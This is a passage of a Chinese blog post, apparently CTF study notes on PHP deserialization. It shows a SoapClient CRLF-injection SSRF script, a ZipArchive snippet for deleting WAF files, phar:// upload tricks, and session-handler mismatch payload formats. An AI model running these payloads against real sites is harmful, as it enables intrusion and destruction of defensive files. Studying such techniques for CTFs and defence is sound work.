class=\"wp-block-code\"><code>&lt;?php\n$target = 'http:\/\/127.0.0.1:6888';\n$post_string = 'token=ly0n';\n$headers = array(\n    'X-Forwarded-For: 127.0.0.1',\n    );\n$b = new SoapClient(null,array('location' =&gt; $target,'user_agent'=&gt;'ly0n^^Content-Type: application\/x-www-form-urlencoded^^'.join('^^',$headers).'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'      =&gt; \"aaab\"));\n\n$aaa = serialize($b);\n$aaa = str_replace('^^',\"\\r\\n\",$aaa);\n$aaa = str_replace('&amp;','&amp;',$aaa);\necho $aaa;\n\n$c = unserialize($aaa);\n$c-&gt;not_exists_function();\n?&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"ENwbM\">\u53cd\u5e8f\u5217\u5316\u94fe\u8df3\u677f (Phar \u5bb6\u65cf)<\/h4>\n\n\n\n<p id=\"u84ba510a\"><strong>\u6d89\u53ca\u7c7b\uff1a<\/strong><\/p>\n\n\n\n<p id=\"u91c53df5\"><code>Phar<\/code><\/p>\n\n\n\n<p id=\"u562fa71e\"><code>PharData<\/code><\/p>\n\n\n\n<p id=\"uf1fe51b3\"><code>PharFileInfo<\/code><\/p>\n\n\n\n<p id=\"u7e3351d5\"><code>PharException<\/code><\/p>\n\n\n\n<p id=\"u199ca8d7\"><strong>\u5229\u7528\u539f\u7406\uff1a<\/strong> \u8fd9\u4e9b\u7c7b\u5728\u4f60\u7684\u5217\u8868\u4e2d\u4e3b\u8981\u662f\u6709 <code>__destruct<\/code> \u548c <code>__wakeup<\/code>\u3002 \u867d\u7136\u5b83\u4eec\u672c\u8eab\u4e0d\u76f4\u63a5\u63d0\u4f9b\u201c\u8bfb\u6587\u4ef6\u201d\u6216\u201c\u6267\u884c\u547d\u4ee4\u201d\u7684\u529f\u80fd\uff0c\u4f46 <code>Phar<\/code> \u5f52\u6863\u6587\u4ef6\u5728\u88ab\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\uff08\u5982 <code>file_exists<\/code>, <code>is_dir<\/code>, <code>file_get_contents<\/code> \u7b49\uff09\u901a\u8fc7 <code>phar:\/\/<\/code> \u4f2a\u534f\u8bae\u89e3\u6790\u65f6\uff0c\u4f1a<strong>\u81ea\u52a8\u53cd\u5e8f\u5217\u5316<\/strong>\u5f52\u6863\u5185\u90e8\u7684 Metadata\u3002<\/p>\n\n\n\n<p id=\"u5aa0fb23\">\u8fd9\u610f\u5473\u7740\uff1a\u5982\u679c\u4f60\u63a7\u5236\u4e86\u6587\u4ef6\u540d\u53c2\u6570\uff0c\u4f46\u627e\u4e0d\u5230 <code>unserialize()<\/code> \u51fd\u6570\uff0c\u4f60\u53ef\u4ee5\u4e0a\u4f20\u4e00\u4e2a\u4f2a\u9020\u7684 <code>.phar<\/code> \u6587\u4ef6\uff08\u53ef\u4ee5\u6539\u540d\u4e3a <code>.jpg<\/code>\uff09\uff0c\u7136\u540e\u5229\u7528 <code>phar:\/\/.\/upload\/Phantom.jpg<\/code> \u53bb\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"VoR6H\">ZipArchive \u7c7b\u5229\u7528 (\u6587\u4ef6\u5220\u9664)<\/h4>\n\n\n\n<p id=\"ufc23ec01\"><code>ZipArchive::open<\/code> \u65b9\u6cd5\u7684\u7b2c\u4e8c\u4e2a\u53c2\u6570\u82e5\u8bbe\u7f6e\u4e3a <code>ZipArchive::OVERWRITE<\/code> (\u5e38\u91cf\u503c\u4e3a8)\uff0c\u4f1a\u8986\u76d6\uff08\u6e05\u7a7a\/\u5220\u9664\uff09\u6307\u5b9a\u6587\u4ef6\u3002\u5e38\u7528\u4e8e\u5220\u9664WAF\u6587\u4ef6 (<code>.htaccess<\/code> \u6216 <code>waf.php<\/code>)<\/p>\n\n\n\n<pre id=\"vght8\" class=\"wp-block-code\"><code>&lt;?php\n$Phantom = new ZipArchive();\n$Phantom-&gt;open('1.txt', 8);\necho serialize($Phantom);<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"425\" data-attachment-id=\"117\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=117\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87.png\" data-orig-size=\"1899,789\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-300x125.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-87-1024x425.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-117\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"C9utT\">session\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<p id=\"u0268eb28\">seeion\u53cd\u5e8f\u5217\u5316\uff0c\u9664\u4e86\u5165\u53e3\u4e0epayload\u683c\u5f0f\u6709\u533a\u522b\u4ee5\u5916\uff0c\u5176\u4ed6\u7684\u90fd\u4e0e\u666e\u901a\u53cd\u5e8f\u5217\u5316\u5dee\u4e0d\u591a<\/p>\n\n\n\n<p id=\"u150d6b4a\">PHP Session \u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\u672c\u8d28\u5dee\u5f02\u5728\u4e8e\uff1a<strong>\u5199\u5165 Session \u6570\u636e\u65f6\u4f7f\u7528\u7684\u5e8f\u5217\u5316\u5f15\u64ce<\/strong>\u4e0e<strong>\u8bfb\u53d6 Session \u6570\u636e\u65f6\u4f7f\u7528\u7684\u53cd\u5e8f\u5217\u5316\u5f15\u64ce<\/strong>\u4e0d\u4e00\u81f4\u3002<\/p>\n\n\n\n<p id=\"u8d07984a\">\u5f53\u653b\u51fb\u8005\u80fd\u591f\u63a7\u5236 Session \u4e2d\u7684\u4e00\u90e8\u5206\u5185\u5bb9\uff0c\u5e76\u6784\u9020\u7279\u6b8a\u7684\u5b57\u7b26\uff08\u4e3b\u8981\u662f\u7ad6\u7ebf <code>|<\/code>\uff09\uff0c\u5c31\u53ef\u4ee5\u5229\u7528\u5f15\u64ce\u89e3\u6790\u683c\u5f0f\u7684\u5dee\u5f02\uff0c\u6b3a\u9a97PHP\u5c06\u6211\u4eec\u6784\u9020\u7684\u5b57\u7b26\u4e32\u8bc6\u522b\u4e3a\u5bf9\u8c61\u5e76\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"FI2Nl\">PHP \u7684\u4e09\u79cd Session \u5e8f\u5217\u5316\u5f15\u64ce<\/h4>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>\u5904\u7406\u5668\u540d\u79f0<\/strong><\/td><td><strong>\u5b58\u50a8\u683c\u5f0f\u793a\u4f8b (\u952e\u540d\u4e3a user, \u952e\u503c\u4e3a Phantom)<\/strong><\/td><td><strong>\u7279\u6027\u63cf\u8ff0<\/strong><\/td><\/tr><tr><td><strong>php<\/strong><\/td><td>user<\/td><td>s:7:&#8221;Phantom&#8221;;<\/td><\/tr><tr><td><strong>php_serialize<\/strong><\/td><td><code>a:1:{s:4:\"user\";s:7:\"Phantom\";}<\/code><\/td><td>PHP 5.5.4+ \u5f15\u5165\u3002\u6807\u51c6\u7684 <code>serialize()<\/code> \u683c\u5f0f\uff0c<strong>\u4e0d<\/strong>\u4f7f\u7528<\/td><\/tr><tr><td><strong>php_binary<\/strong><\/td><td><code>\\x04user...<\/code><\/td><td>\u952e\u540d\u7684\u957f\u5ea6\u5bf9\u5e94\u7684 ASCII \u5b57\u7b26 + \u952e\u540d + \u5e8f\u5217\u5316\u503c\u3002\uff08\u5229\u7528\u8f83\u5c11\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p id=\"u529b37d0\">\u5982\u679c\u662f <code>php_serialize<\/code> \u5199\u5165\uff0c\u4f46\u7528 <code>php<\/code> \u5f15\u64ce\u8bfb\u53d6\uff0c<code>php<\/code> \u5f15\u64ce\u4f1a\u628a\u5185\u5bb9\u4e2d\u7684 <code>|<\/code> \u5f53\u4f5c\u952e\u503c\u5206\u9694\u7b26\u3002<\/p>\n\n\n\n<p id=\"u53aab9cc\">\u7b80\u5355\u603b\u7ed3\u6765\u8bf4<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>\u653b\u51fb\u573a\u666f<\/strong><\/td><td><strong>\u6838\u5fc3\u524d\u7f6e\u6761\u4ef6<\/strong><\/td><td><strong>Payload \u539f\u59cb\u683c\u5f0f (Raw String)<\/strong><\/td><td><strong>\u6ce8\u5165\u4f4d\u7f6e<\/strong><\/td><\/tr><tr><td><strong>\u5f15\u64ce\u914d\u7f6e\u4e0d\u4e00\u81f4<\/strong><br><br>(Handler Mismatch)<\/td><td><strong>\u5b58\u50a8<\/strong>: <code>php_serialize<\/code><br><br><strong>\u8bfb\u53d6<\/strong>: <code>php<\/code><br><br><strong>\u53d8\u91cf<\/strong>: \u53ef\u63a7<\/td><td><code>|O:7:\"User\":1:{...}<\/code><\/td><td><code>$_GET<\/code> \/ <code>$_POST<\/code> \u53d8\u91cf<br><br>(\u8d4b\u503c\u7ed9 <code>$_SESSION<\/code>)<\/td><\/tr><tr><td><strong>Upload Progress<\/strong><br><br>(\u7ade\u4e89\u6761\u4ef6)<\/td><td><strong>\u914d\u7f6e<\/strong>: <code>enabled=On<\/code><br><br><strong>\u8bfb\u53d6<\/strong>: <code>php<\/code><br><br><strong>\u53d8\u91cf<\/strong>: \u65e0\u9700\u53ef\u63a7<\/td><td><code>|O:7:\"User\":1:{...}<\/code><\/td><td>POST \u8bf7\u6c42\u4f53\u4e2d\u7684<br><br><code>PHP_SESSION_UPLOAD_PROGRESS<\/code> \u503c<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"d9r4D\"><strong>\u4f8b\u9898<\/strong><\/h4>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"723\" height=\"412\" data-attachment-id=\"118\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=118\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" data-orig-size=\"723,412\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88-300x171.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-88.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-118\"  sizes=\"auto, (max-width: 723px) 100vw, 723px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"596\" height=\"215\" data-attachment-id=\"119\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=119\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" data-orig-size=\"596,215\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89-300x108.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-89.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-119\"  sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ub648f6b8\">\u901a\u8fc7index\u5f97\u77e5\uff0c\u60f3\u8981\u8f93\u51faflag\u9700\u8981\u6ee1\u8db3name\u548cher\u7684\u503c\u76f8\u7b49\u7684\u6761\u4ef6<\/p>\n\n\n\n<p id=\"u2b3ef8aa\">\u53ef\u4ee5\u7528\u524d\u9762\u63d0\u5230\u7684php\u5f15\u7528\u6765\u5b9e\u73b0\u8fd9\u4e2a\u6761\u4ef6<img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2026\/png\/44105438\/1767358819218-3271455b-f79d-4d62-a054-a7560ba8700c.png\" width=\"1024\"><\/p>\n\n\n\n<p id=\"u1d13d9aa\">\u6211\u4eec\u628a\u5f97\u5230\u7684payload\u4f7f\u7528|\u6765\u5206\u9694<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" data-attachment-id=\"120\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=120\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90.png\" data-orig-size=\"1280,740\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-300x173.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-90-1024x592.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-120\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"664\" height=\"398\" data-attachment-id=\"121\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=121\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" data-orig-size=\"664,398\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91-300x180.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-91.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-121\"  sizes=\"auto, (max-width: 664px) 100vw, 664px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"hFjNY\">phar\u53cd\u5e8f\u5217\u5316<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"for6q\">\u7b80\u4ecb<\/h4>\n\n\n\n<p id=\"u28a74b73\">Phar\u53cd\u5e8f\u5217\u5316\u4e0d\u4f9d\u8d56unserialize()\u51fd\u6570\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002\u800c\u662f\u6784\u9020phar\u6587\u4ef6\uff0c\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u81ea\u5b9a\u4e49\u7684meta-data\u8fd9\u4e00\u7279\u6027\uff0c<code>phar_parse_metadata<\/code>\u5728\u89e3\u6790meta\u6570\u636e\u65f6\uff0c\u4f1a\u8c03\u7528<code>php_var_unserialize<\/code>\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\u3002\u5177\u4f53\u89e3\u6790\u4ee3\u7801\u3002\u8be5\u65b9\u6cd5\u9700\u8981\u5728\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\uff08file_exits()\u3001is_dir()\u7b49\uff09\u53c2\u6570\u53ef\u63a7\u7684\u60c5\u51b5\u4e0b\uff0c\u914d\u5408phar:\/\/\u4f2a\u534f\u8bae\u76f4\u63a5\u8fdb\u884c\u53cd\u5e8f\u5217\u5316\u3002<strong>\u5373\u672c\u5730\u6784\u9020phar\u6587\u4ef6\u628a\u6076\u610f\u4ee3\u7801\u672c\u5730\u5e8f\u5217\u5316\u597d\uff0c\u518d\u901a\u8fc7\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u70b9\u4e0a\u4f20phar\u6587\u4ef6\u81f3\u76ee\u6807\u7f51\u7ad9\uff0c\u6700\u540e\u7528phar\u534f\u8bae\u914d\u5408\u6587\u4ef6\u7cfb\u7edf\u51fd\u6570\u53cd\u5e8f\u5217\u5316phar\u6587\u4ef6\uff0c\u8fbe\u5230\u9884\u671f\u76ee\u7684\u3002<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"BdSLj\"><strong>phar\u6587\u4ef6<\/strong><\/h4>\n\n\n\n<p id=\"u7898b17e\"><strong>phar<\/strong>\u6587\u4ef6\u662f\u4e00\u79cd\u6253\u5305\u5f62\u5f0f\uff0c\u628aphp\u4ee3\u7801\u548c\u5176\u4ed6\u8d44\u6e90\uff08\u56fe\u50cf\u3001\u8868\u7b49\uff09\u6346\u7ed1\u5230\u4e00\u4e2a\u5f52\u6863\u6587\u4ef6\u4e2d\u6765\u5b9e\u73b0\u5e94\u7528\u7a0b\u5e8f\u548c\u5e93\u7684\u5f00\u53d1\uff0c\u8ddfjar\u6587\u4ef6\u5dee\u4e0d\u591a\u3002\u672c\u8d28\u4e0a\u662f\u4e00\u4e2a\u538b\u7f29\u6587\u4ef6\uff0c\u4f1a\u8bae\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u5728\u81ea\u5b9a\u4e49\u7684meta-<strong>data<\/strong>\u5185\u7684\u5185\u5bb9<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" data-attachment-id=\"122\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=122\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92.png\" data-orig-size=\"1919,878\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image\" data-image-description=\"\" data-image-caption=\"\" data-medium-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-300x137.png\" data-large-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png\" data-original=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-92-1024x469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-122\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"UX9nn\">\u6587\u4ef6\u7ed3\u6784<\/h4>\n\n\n\n<pre id=\"eNmUl\" class=\"wp-block-code\"><code>stub:phar\u6587\u4ef6\u7684\u6807\u5fd7\uff0c\u5fc5\u987b\u4ee5 xxx __HALT_COMPILER();?&gt; \u7ed3\u5c3e\uff0c\u5426\u5219\u65e0\u6cd5\u8bc6\u522b\u3002xxx\u53ef\u4ee5\u4e3a\u81ea\u5b9a\u4e49\u5185\u5bb9\u3002\n\/\/\u7b80\u5355\u5730\u8bf4\u5c31\u662f\u544a\u8bc9\u7cfb\u7edf\u81ea\u5df1\u662f\u4e00\u4e2a\u4ec0\u4e48\u6837\u7684\u6587\u4ef6,\u58f0\u660e\u6587\u4ef6\u540e\u7f00\n\nmanifest:phar\u6587\u4ef6\u672c\u8d28\u4e0a\u662f\u4e00\u79cd\u538b\u7f29\u6587\u4ef6\uff0c\u5176\u4e2d\u6bcf\u4e2a\u88ab\u538b\u7f29\u6587\u4ef6\u7684\u6743\u9650\u3001\u5c5e\u6027\u7b49\u4fe1\u606f\u90fd\u653e\u5728\u8fd9\u90e8\u5206\u3002\u8fd9\u90e8\u5206\u8fd8\u4f1a\u4ee5\u5e8f\u5217\u5316\u7684\u5f62\u5f0f\u5b58\u50a8\u7528\u6237\u81ea\u5b9a\u4e49\u7684meta-data\uff0c\u8fd9\u662f\u6f0f\u6d1e\u5229\u7528\u6700\u6838\u5fc3\u7684\u5730\u65b9\u3002\n\/\/\u5b58\u653e\u5e8f\u5217\u5316\u7684\u5185\u5bb9\n\ncontent:\u88ab\u538b\u7f29\u6587\u4ef6\u7684\u5185\u5bb9\n\nsignature (\u53ef\u7a7a):\u7b7e\u540d\uff0c\u653e\u5728\u672b\u5c3e\u3002<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93-1024x470.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"470\" data-attachment-id=\"123\" data-permalink=\"https:\/\/zhihao.org.cn\/?attachment_id=123\" data-orig-file=\"https:\/\/zhihao.org.cn\/wp-content\/uploads\/2026\/01\/image-93.png\" data-orig-size=\"1909,876\" data-comments-opened=\"1\" 